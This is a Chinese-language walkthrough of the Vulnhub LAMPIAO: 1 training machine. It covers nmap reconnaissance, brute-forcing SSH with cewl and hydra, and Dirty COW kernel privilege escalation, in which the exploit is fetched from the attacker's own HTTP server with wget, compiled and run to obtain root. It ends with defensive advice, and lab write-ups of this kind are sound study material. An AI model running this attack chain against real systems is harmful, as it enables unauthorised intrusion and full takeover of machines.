Vulnhub LAMPIAO: 1 靶机渗透
字数 1424 2025-08-14 12:04:09
LAMPIAO: 1 靶机渗透教学文档
1. 靶机基本信息
- 靶机名称: LAMPIAO
- 下载链接: https://download.vulnhub.com/lampiao/Lampiao.zip
- 运行环境: Virtual Box (解压后导入.ovf文件)
- 测试环境:
- 攻击机(Kali Linux) IP: 192.168.43.86
- 靶机IP: 192.168.43.143
2. 信息收集阶段
2.1 网络扫描
使用arp-scan识别靶机IP:
arp-scan -l
2.2 端口扫描
使用nmap进行端口扫描:
nmap -sV 192.168.43.143
扫描结果:
- 22/tcp - SSH
- 80/tcp - HTTP
- 1898/tcp - HTTP
2.3 Web服务枚举
- 检查80端口和1898端口的HTTP服务
- 1898端口发现一个Drupal网站
- 目录扫描发现
robots.txt文件
2.4 网站内容分析
- 检查
robots.txt发现CHANGELOG.txt- 显示系统运行Drupal 7.x版本
- 发现可点击节点:
node/2和node/3
node/2包含:- 音频文件(.m4a): 包含提示"user:tiago"
- PNG文件: 包含二维码(扫描后无有用信息)
node/3包含:- 音频文件
- 文字提示"Node 2 is not working"
3. 漏洞利用阶段
3.1 密码爆破
- 使用
cewl生成密码字典:cewl http://192.168.43.143:1898 -w passwords.txt - 使用
hydra爆破SSH:
成功获取凭据:hydra -l tiago -P passwords.txt ssh://192.168.43.143tiago:Virgulino
3.2 SSH登录
ssh tiago@192.168.43.143
3.3 提权准备
- 检查sudo权限:
无可用sudo权限sudo -l - 识别系统信息:
- 2016年的Drupal 7系统
- 可能受"Dirty COW"漏洞影响(CVE-2016-5195)
3.4 Dirty COW提权
-
搜索可用exploit:
searchsploit dirty cow选择
40847.cpp -
在Kali上设置简易HTTP服务器:
python2 -m SimpleHTTPServer 1234(注意: Python3需要使用不同命令)
-
在靶机上下载exploit:
cd /tmp wget http://192.168.43.86:1234/40847.cpp -
编译exploit:
g++ -O2 -std=c++11 -pthread -o dirtycow 40847.cpp -lutil编译选项说明:
-O2: 优化级别2-std=c++11: 使用C++11标准-pthread: 多线程支持-lutil: 链接util库
-
执行exploit:
./dirtycow获取root密码:
dirtyCowFun -
使用root登录:
su root或直接使用SSH:
ssh root@192.168.43.143
4. 获取flag
查找并查看flag文件:
find / -name flag.txt -type f 2>/dev/null
cat /path/to/flag.txt
5. 关键知识点总结
- 多端口HTTP服务检查: 不要只关注80端口
- 信息收集技巧:
- robots.txt检查
- 网站节点枚举(node/1, node/2等)
- 多媒体文件分析(音频、图片)
- 密码爆破:
- cewl生成字典
- hydra进行爆破
- Dirty COW提权:
- Linux内核漏洞(CVE-2016-5195)
- 适用于较旧Linux系统
- 需要C++编译环境
- 简易HTTP服务器:
- Python2的SimpleHTTPServer
- 用于文件传输
6. 防御建议
- 及时更新系统和内核
- 禁用不必要的用户账户
- 使用强密码策略
- 限制sudo权限
- 定期检查系统漏洞
7. 参考资源
- Dirty COW漏洞说明: https://dirtycow.ninja/
- Drupal安全公告: https://www.drupal.org/security
- Vulnhub靶机下载: https://www.vulnhub.com/